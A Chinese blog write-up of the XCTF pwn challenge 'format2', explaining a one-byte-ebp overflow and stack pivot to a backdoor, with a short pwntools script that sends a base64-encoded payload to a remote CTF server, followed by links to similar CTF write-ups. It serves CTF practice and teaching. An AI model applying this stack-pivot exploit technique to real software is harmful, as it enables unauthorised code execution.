format2 攻防世界

最新推荐文章于 2024-11-22 18:35:10 发布
原创 最新推荐文章于 2024-11-22 18:35:10 发布 · 735 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

博主解题时原以为是栈溢出或直接验证,但md5解不开。发现输入字符限定30无法利用长度变量操作。进入check函数后,发现可溢出修改ebp,且有后门函数,通过栈转移,利用输入值修改ebp,最终用三行代码实现控制程序流程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这个题 确实很恶心

本来感觉应该是栈溢出 或者  直接验证   但是 md5 解不开 然后调试的时候逐渐发现问题

晕死,,

虽然长度那个变量是 无符号 但是  输入字符限定 30 我们也没有什么办法  来通过 这个来操作

然后进入check 函数

发现v4 可以  溢出修改ebp

并且这里有后门函数

ebp  ebp ebp    栈转移

 

两个  leave 和  retn  那么 就可以 通过输入的值 来修改ebp  input

先把ebp 转化成 input 的地址   然后 mov   esp ebp       esp 的值变成了 input 的地址

然后 在mov esp  ebp   pop ebp    ret (pop rip) 

这里  的 pop rip 就可以控制流程了

三行代码搞定,,,  等等  三行代码

#!/usr/bin/env python2
# -*- coding:utf-8 -*-
from pwn import*
import base64
context(log_level = 'debug', arch = 'amd64' , os = 'linux')
system_addr=0x08049284
input_addr=0x0811EB40
flag=0
if flag:
	io  = process("./format2")
else:
	io  = remote("111.198.29.45",42949)
paload='a'*4+p32(system_addr)+p32(input_addr)
io.sendline(base64.b64encode(paload))
io.interactive()

 

攻防世界”pwn之format2
qq_42728977的博客
12-11 549
原理: 栈溢出、后门 环境: ubuntu14 工具: pwntools 、IDA 步骤: 查看程序的基本信息: 可以看出程序是32位,斌开了canary和nx 在IDA进行分析查看 看到程序并没有canary的压栈,我当时很奇怪为什么,让你后又看了几个函数,发现也没有,后来看大佬的 WP说是部分函数有,这里的canary是个迷惑。这没有canary就方便很多了。 一点一点看,发现这就是一个...
format2(xctf)
weixin_43868725的博客
09-02 824
0x0 程序保护和流程 保护: 流程: main() 接收一个最长为30的字符串,通过base64解密后长度小于12就会将解密后的字符串复制到input处,之后调用auth()。 在将input中的字符串复制到v4的时候存在四个字节的溢出。如果返回值为1的话就会进入correct()。 此时如果input==0xDEADBEEF的话就能够getshell了。 0x1 利用过程 1.虽然checksec提示说程序开启了canary但是在主要逻辑上的函数都没有开启canary,所以可以进行溢出。 2.因
攻防世界PWN之format2题解
seaaseesa的博客
11-10 876
format2(整数地址空间溢出) 本题需要细心 首先,检测一下程序保护机制 虽然说开启了CANARY,但是关键的几个函数没有开启这个机制,这道题因为libc库静态链接到文件里,所以才造成这种干扰。 我们用IDA分析一下 后门函数 溢出点在这,memcpy传入的是v4的地址,而v4是int,最多也就8字节,因此这里可以溢出 程序的流程是将我们输入的字符串进行BASE6...
攻防世界-PWN-Format2解题过程
aptx4869_li的博客
07-24 542
# 解题思路 ## 安全机制检查 ``` healer@kali:~/Desktop/format1$ readelf -h format1 ELF Header: Magic: 7f 45 4c 46 01 01 01 03 00 00 00 00 00 00 00 00 Class: ELF32 Data: 2's complement, little endian ...
xctf format2
doudoudedi
10-01 354
日常水题的一天这个和pwnable.kr 上的一道题很像也是一道栈迁移的题目 我们直接看main函数 把输入的base64解密长度不能超过12 目的是correct函数 发现这里可以覆盖ebp我们就可以将栈迁移到input处然后mov esp,ebp ; pop ebp; pop eip;main函数公用ebp控制eip为我们的后门地址直接拿到shell(打pwn不要限制于拿到shell哦...
攻防世界 Windows_Reverse2
weixin_53349587的博客
03-13 974
这道题其实不算难,只不过我想的有点复杂了,看来学逆向还是需要具有发散性思维的,有些问题确实想不到啊!! 查壳发现有aspack壳: 根据日常习惯,直接手动脱壳(其实是脱壳工具没找着。。),32位程序,x32dbg打开: 首先看到程序中有一个pushad指令,按照我习惯的脱壳方法,直接F8执行pushad,然后在栈中下一个硬件断点,F9运行,即可找到popad的位置 继续往下执行,一直到地址为0x726425的ret指令执行完: 看到一个关键的jmp指令(jmp的距离比较远,极有可能跳转..
CTF 攻防世界 Web: SSRF Me write-up
最新发布
qq_60256199的博客
11-22 784
CTF 攻防世界 Web: SSRF Me write-up
攻防世界welpwn解题方法
liucc09的博客
01-07 470
分析 题目很程序很简单,输入字符串,将遇到\x00前的字符拷贝给s2数组,如果拷贝数量大于s2在栈上的空间就会发生溢出,可以覆盖到ret的位置从而控制程序流。 需要注意的是覆盖ret用的地址肯定会包含\x00,因此构造的rop链会断开,所以需要想办法。 解决办法为通过一串pop ret指令将栈上内容弹出,然后直接连接到buf所在位置继续rop链的执行。 输入buf后栈空间如下所示,可以看出在ret指令的位置填入一个具有四个pop再加一个ret的地址刚好能弹出buf中已经用掉的4*0x8个字节,然后就能续上
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 705
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
pwn 练习笔记 format2
SsMing的博客
08-16 377
例子是protostar format2 源码为: 和昨天的思路一样,确定要通过格式化字符串洞覆盖target的内容,题目的目的是要让target等于64 1.找到target的地址 2.计算偏移量 先起手个200个 我们发现第四个就是我们的ABCD,所以改一下payload 然后要是target的值为64 ,在括号之前要有64个字符,这里前面已经有34个,还差30个...
2019XCTF攻防世界之萌新入坑(time_formatter)
weixin_44113469的博客
04-11 2009
time_formatter
攻防世界Reverse进阶区-IgniteMe-writeup
y4ung
09-19 823
1. 介绍 本题是xctf攻防世界中Reverse的进阶区的题IgniteMe 题目来源: 高校网络信息安全运维挑战赛 2. 分析 $ file fac4d1290e604fdfacbbe06fd1a5ca39.exe fac4d1290e604fdfacbbe06fd1a5ca39.exe: PE32 executable (console) Intel 80386, for MS Windows C:\Users\hzy\Downloads>fac4d1290e604fdfacbbe06fd1
攻防世界(pwn)Noleak
PLpa的博客
03-03 1665
前言: 看了大佬们的writeup,发现这题解法真的非常多,我这里用的是unsortedbin的地址写漏洞,详情可以看ctfwiki了解漏洞原因。 没开NX,有可以执行的堆栈,但是开启了Full RELRO,不能修改got表地址了。 打开IDA: 发现是一个菜单题,可以创建,删除,更新堆快信息,没有输出信息的选项,果然Noleak。 我们这里可以一个一个功能去看,看看漏洞存在哪里: 经过观察...
攻防世界-alexctf-2017 re2-cpp-is-awesome
qq_45771413的博客
04-22 309
查壳 无壳 IDA 挨个看过去只有红框有具体内容,橙色箭头输出失败或成功。那关键就在这个if判断里。 仔细分析这里,发现红框的 off_6020A0和dword_6020C0都是已知的字符串,(其中后者需要处理下间隔,而且是以16进制数字示人)。这种套娃字符串的形式可当作用 6020C0字符串作为下标对6020A0进行排序。 EXP arrA0=[36, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 54, 0, 0,
CTF刷题记录--format2(整数溢出)
Jerryspaceman的博客
04-01 1196
###上周做了两个题,结果笨人去准备csp认证去了,准备了一周结果还是考了一坨,麻了,发现可能还是不适合打算法呜呜(羡慕算法大佬),笨人还是乖乖搞CTF手艺活了(两道题的题解回头有时间发,这次先做个难度5的复健去)https://adworld.xctf.org.cn/challenges/list题目链接放在上面了,还是攻防世界的(BUUCTF难度好大,下次一定)DIE结果我就不放图了,结果是32位linux上面的,没有壳。但是checksec出现了canary found,这就比较有意思了,我也是第一次
[XCTF-pwn] 22_format2
weixin_52640415的博客
03-08 286
移栈 一个移栈的小题,1:没开pie而且输入的内容放在bss中地址已知,2:程序的correct给了后门,虽然不能直接运行到但可以当后门用,3:auth函数将解码后的input复制到v4,而v4定义是ebp-8当输入大于8里就会溢出到ebp int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp+18h] [ebp-28h] BYREF char s[30]; // [esp+1Eh]
ceph format2格式image
weixin_37871174的博客
05-05 1344
1、接上篇,这创建一个format 2格式的image $rbd create rbd/format2_image_1G –image-format=2 -s 1G2、显示image元数据信息:size,order,block_name_prefix,format,features,flag $rbd info rbd/format2_image_1G rbd image ‘format2_i
xctf社区题解2-reverse新手(新手看的,大佬绕道)
Spwpun的博客
03-31 4460
文章目录reverse-新手模式:re1: reverse-新手模式: re1: IDA中F5查看反汇编之后的C代码: 这里将输入的字符串放在变量v11中,然后与v7对比,v7和v8是连续的栈中变量,先后存放flag的一部分,找到给变量赋值的地方: 然后用python处理字符串输出: 待续… ...
ceph format1格式image
weixin_37871174的博客
05-05 982
ceph image有两种格式,目前我的ceph版本默认的格式是format 2,如果要指定创建的格式需要增加参数–image-format=1,这两种格式的区别在于是否支持clone及其扩展等功能。 format 1 - Use the original format for a new rbd image. This format is understood by all versions o
Delphi的Format函数深度解析
Format('thisis%u', [2]); // 输出 "thisis4294967294" (对于无符号整数) Format('thisis%e', [-2.22]); // 输出 "thisis-2.22000000000000E+000" Format('thisis%g', [02.200]); // 输出 "thisis2.2" Format('...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值